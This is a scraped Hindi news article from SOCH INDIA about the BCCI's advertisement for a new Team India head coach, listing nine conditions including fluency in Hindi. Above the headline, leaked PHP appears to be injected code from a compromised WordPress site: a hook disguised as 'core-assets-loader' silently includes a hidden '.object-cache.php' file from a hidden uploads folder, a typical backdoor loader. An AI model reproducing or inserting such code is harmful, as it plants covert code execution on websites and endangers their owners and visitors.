add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); टीम इंडिया के लिए BCCI को चाहिए हिंदी बोलने वाला कोच, 9 शर्तें रखीं – SOCH INDIA
Menu

खेल
टीम इंडिया के लिए BCCI को चाहिए हिंदी बोलने वाला कोच, 9 शर्तें रखीं

nobanner

बीसीसीआई नहीं चाहता कि जो शख्स टीम इंडिया का नया कोच बने, वह सिर्फ इंग्लिश ही बोले। हेड कोच के लिए जारी एडवर्टाइजमेंट में बोर्ड ने 9 शर्तें रखी हैं। ये शर्तें कहती हैं कि कोच को अंग्रेजी ताे आनी ही चाहिए, लेकिन साथ में हिंदी और बाकी रीजनल लैंग्वेज में भी कम्युनिकेट करने आना चाहिए।

– बीसीसीआई प्रेसिडेंट अनुराग ठाकुर ने 22 मई को एलान किया था कि बोर्ड इस पोस्ट के लिए एडवर्टाइजमेंट जारी करेगा। इसके बाद बीसीसीआई ने बुधवार को ऐड जारी किया।
– एप्लिकेशन देने की आखिरी तारीख 10 जून तय की गई है।
– बता दें कि टीम इंडिया के डायरेक्टर रवि शास्त्री, बैट्समैन कोच संजय बांगड़, बॉलर कोच भरत अरुण और फील्डिंग कोच आर श्रीधर के कॉन्ट्रैक्ट मार्च में T20 वर्ल्ड कप के बाद खत्म हो गये थे।
– सभी 2014 में इंग्लैंड में हुई वनडे सीरीज के बाद से कोचिंग स्टाफ का हिस्सा थे।
– बांगड़ को इसी महीने होने वाले जिम्बाब्वे दौरे के लिए टीम इंडिया का कोच बनाया गया है।
– अंडर-19 और भारत-ए टीम के साथ काम कर चुके अभय शर्मा को इस दौरे के लिए फील्डिंग कोच अप्वाइंट किया गया है।
पहली शर्त : हिंदी आना जरूरी
– बोर्ड ने जो एडवर्टाइजमेंट जारी किया है, उसके छठे प्वाइंट में लिखा गया है, “एक इंटरनेशनल टीम के कोच के लिए कम्युनिकेशन स्किल्स बेहतर होना जरूरी है।”
– “इसके अलावा, मैसेज भी असरदार तरीके से कम्युनिकेट करने के लिए अंग्रेजी में प्रोफिशिएंसी होना जरूरी है। हिंदी और दूसरी रीजनल लैंग्वेज में अपनी बात रखना भी आना चाहिए।”
ये हैं बाकी 8 शर्तें
– बोर्ड की अहम शर्त यह है कि कैंडिडेट ने आईसीसी की मेंबर कंट्रीज की टीम, फर्स्ट क्लास क्रिकेट और इंटरनेशनल लेवल पर किसी टीम की कामयाबी के साथ कोचिंग की हो।
– कैंडिडेट ने मेंबर कंट्रीज से सर्टिफिकेशन या असेसमेंट प्रोग्राम किया हो। उसके पास वैलिड सर्टिफिकेशन हो।
– वह सभी तरह के फॉर्मेट में टीम इंडिया के लीडरशिप पोजिशन हासिल करने के लिए प्लान बनाए और उसे प्रेजेंट करे।
– इंडिविजुअल प्लेयर परफॉर्मेंस सुधारने के तरीके बताए, जिनसे टीम की परफॉर्मेंस में लगातार कंसिस्टेंसी बनी रहेगी।
– स्पोर्ट्स साइकोलॉजी, स्पोर्ट्स मेडिसिन, वर्कलोड मैनेजमेंट जैसी मल्टी-डिसिप्लीनरी अप्रोच होना चाहिए, ताकि टीम में कॉन्ट्रिब्यूशन बढ़ाया जा सके।
– स्पोर्ट्स सॉफ्टवेयर, ट्रेन्ड्स और लेटेस्ट टेक्नोलॉजी की जानकारी होनी चाहिए।
– कैंडिडेट का पर्सनल रिकॉर्ड बेदाग होना चाहिए। अतीत में वह किसी तरह के विवाद से न जुड़ा हो।
– नेक्स्ट जनरेशन के क्रिकेटर्स को डेवलप करने के लिए उसके पास नेशनल क्रिकेट एकेडमी के लिए प्लान होना चाहिए।
शास्त्री करेंगे अप्लाई
– टीम इंडिया के पूर्व डायरेक्टर शास्त्री, बांगड़, भरत अरुण और आर. श्रीधर के साथ अगले कुछ दिनों में बीसीसीआई के कोचिंग स्टाफ के लिए दोबारा अप्लाई करेंगे।
– बोर्ड के एक अफसर ने इसे कन्फर्म किया है। उनके मुताबिक, ”सभी तीनों कोच (अरुण, बांगड़, श्रीधर) शास्त्री के साथ एप्लिकेशन भर रहे हैं, क्योंकि उन्हें बीसीसीआई के टॉप अफसरों से पॉजिटिव सिग्नल मिले हैं।